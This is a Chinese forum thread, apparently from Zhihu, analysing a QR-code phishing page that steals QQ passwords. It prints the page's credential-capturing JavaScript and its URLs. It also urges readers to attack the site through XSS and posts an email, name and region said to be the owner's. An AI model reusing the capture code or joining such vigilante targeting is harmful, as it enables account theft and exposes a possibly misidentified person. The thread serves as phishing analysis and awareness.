標籤:

最近幾天qq集體被盜?

最近幾天身邊出現幾起qq被盜事件。被盜qq發一些亂七八糟的說說更改簽名。這是怎麼回事?


都是套路啊,現在我來教教題主如何找網站信息的套路。

首先,我根據題主問題內的圖片截了圖一張二維碼。

然後來看看這張二維碼隱藏了什麼秘密,讓這麼多人中招。

先用草料二維碼掃描器,掃描一下二維碼。

可以看到結果是一個短網址。

然後去短網址還原。

(~ ̄▽ ̄)→))* ̄▽ ̄*)o,這麼長一串的域名,難怪要用短網址。

去訪問一下這個地址吧!

欸!居然只能用手機訪問(挺狡猾的,畢竟這麼長的域名,在電腦上面直接就能看到,中招的都是在空間裡面掃描二維碼的,然後打開的是內置的QQ瀏覽器,看不到域名!)

這就想套路我了?來吧!

Chrome瀏覽器按下F12,然後點那個三個點點的按鈕,選擇。。。(看圖說話吧)(摔

然後就是下面這個樣子

把User agent後面的勾取消掉,就可以選擇UA了!

當然還可以自定義UA,看個人需要,這裡我就不多說了。

再刷新一下網頁!

看吧,這樣就出來了!

按Ctrl+u查看源代碼。

function IsPC() {
var userAgentInfo = navigator.userAgent;
var Agents = ["Android", "iPhone",
"SymbianOS", "Windows Phone",
"iPad", "iPod"];
var flag = true;
for (var v = 0; v &< Agents.length; v++) { if (userAgentInfo.indexOf(Agents[v]) &> 0) {
flag = false;
break;
}
}
return flag;
}

if(IsPC()){
alert(請使用手機訪問);
$(body).hide();
} else {
$(body).show();
}

就是判斷了用戶的UA,只能是變數Agents列表裡面的元素(只學過Python,不懂javascript,說錯請見諒),所以電腦訪問就會彈窗提示請使用手機訪問

除此之外,整個網站還引入了兩個文件。

http://64suv.0fbp68wmj.71437870.bid/jj.php
http://64suv.0fbp68wmj.71437870.bid/js/jquery.js

是不是一看php文件就以為是要請求這個php文件?這樣人家就套路到你了!

&

接著分析關鍵的代碼

$.post("/ch.php?"+$(#kA44169C9347F69).val(), {
uA44169C9347F69: $("#uA44169C9347F69").val(),
pA44169C9347F69: $("#pA44169C9347F69").val()
}, function(data,status){

if(t&<1) { $(#uA44169C9347F69).attr(value,); $(#pA44169C9347F69).attr(value,); $(#mA44169C9347F69).html(u0051+u0051+u5e10+u53f7+u6216+u5bc6+u7801+u9519+u8bef+uff0c+u8bf7+u91cd+u65b0+u8f93+u5165+uff01); t++; $(#uA44169C9347F69).focus(); }else{ $(#mA44169C9347F69).html(nbsp;); document.location="/ch.php?"+($(#kA44169C9347F69).val())+"__go__"+("sizAK06vXH"); } });

這個就是當被套路的人填完賬號和密碼之後點登陸發送的請求,當然他是不會驗證的密碼是否正確的。就直接提示你QQ帳號或密碼錯誤,請重新輸入!

套路又來了!很多人被套路之後,就會再去輸入一次,如果輸入正確,直接就會進用戶的QQ空間,沒輸入正確的話,就跳轉到QQ空間頁面。

原因就是代碼裡面有個變數t,它起了關鍵作用,t的初始值是0,所以會執行一次post請求的if分支代碼,這時候它自增了,你再登陸的時候,自然就執行else分支了。

也就是

http://64suv.0fbp68wmj.71437870.bid/ch.php?64suv__go__ird7YhvIUE

http://txz.qq.com/p?k=186jv4ddLxjHgT1eMHx7Gve6hLYbzmLKf=549000912 (二維碼自動識別)

最後提示一下,想要把這個網站搞掉,為民除害的朋友,你們運氣不錯!這個站長腦子瓦特了!

他注釋了這段代碼

/*

if(t&<1) { p(); $(#uA44169C9347F69).attr(value,); $(#pA44169C9347F69).attr(value,); $(#mA44169C9347F69).html(u0051+u0051+u5e10+u53f7+u6216+u5bc6+u7801+u9519+u8bef+uff0c+u8bf7+u91cd+u65b0+u8f93+u5165+uff01); t++; $(#uA44169C9347F69).focus(); }else{ p(); $(#mA44169C9347F69).html(nbsp;); document.location="/ch.php?"+($(#kA44169C9347F69).val())+"__go__"+("ZYqkSJQL13"); } */ return false; }

發現是不是和上面的post請求代碼一樣,但是有點不同?對,他調用了p()函數。

我們來看看函數的代碼

function p()
{
var t=Date.parse(new Date());
var s=encode64($(#kA44169C9347F69).val()+" "+$("#uA44169C9347F69").val()+" "+$("#pA44169C9347F69").val());
var htmlobj=$.ajax({url:"/tpl/36402021580636317/"+s+".gif_"+t,async:false});
}

也很簡單,就是一個ajax請求。

變數s的值是base64加密("64suv"+"輸入的QQ"+製表符+"密碼"+製表符)

這裡我輸入QQ為123456,密碼123456123,那麼s就是NjRzdXYlMDkxMjM0NTYlMDkxMjM0NTYxMjM=

所以請求就是

http://64suv.0fbp68wmj.71437870.bid/tpl/36402021580636317/NjRzdXYlMDkxMjM0NTYlMDkxMjM0NTYxMjM=.gif_1474950810000

所以要想插xss的朋友,真是幸運,這腦抽站長,活該!叫他害別人。

其他信息

13669685481@126.com

li fang fang

廣西 南寧 中國移動

我沒有社工褲,社工能力也不行╮(╯-╰)╭

以上僅僅是個人分析,本人僅僅是個網路安全愛好者,說錯的地方請指出!

所以,接下來的事情就拜託其他滲透測試牛人了(? ??_??)?


qq微信等內置頁面需要輸入賬號密碼啥的第一步,往下拉。看看鏈接來源。

還有就是,現在第三方自動登錄這麼成熟了,所以賬號密碼的這種登錄方式我是拒絕的


釣魚網站啊,還是要提高自己的互聯網姿勢水平


是一個人被盜感染了其他人吧

比如感染者A自動發了個說說,裡面有個二維碼

然後好友去掃了,就變成感染者B了


你沒發現過一段時間就會有一大堆QQ被盜然後發這些東西嗎 除了內容每次都不一樣 套路和上當的人幾乎都一樣


推薦閱讀:

繼續說我和隔壁老王 WiFi 的事 —— 續集
腳本小子自封黑客誤闖暗槍世界(上)少年的心理魔障
十一之後網路發帖評論彈幕全面實名制,你還有什麼不放心?
快訊:Ubuntu官方論壇被黑,200萬用戶信息泄露

TAG:網路安全 |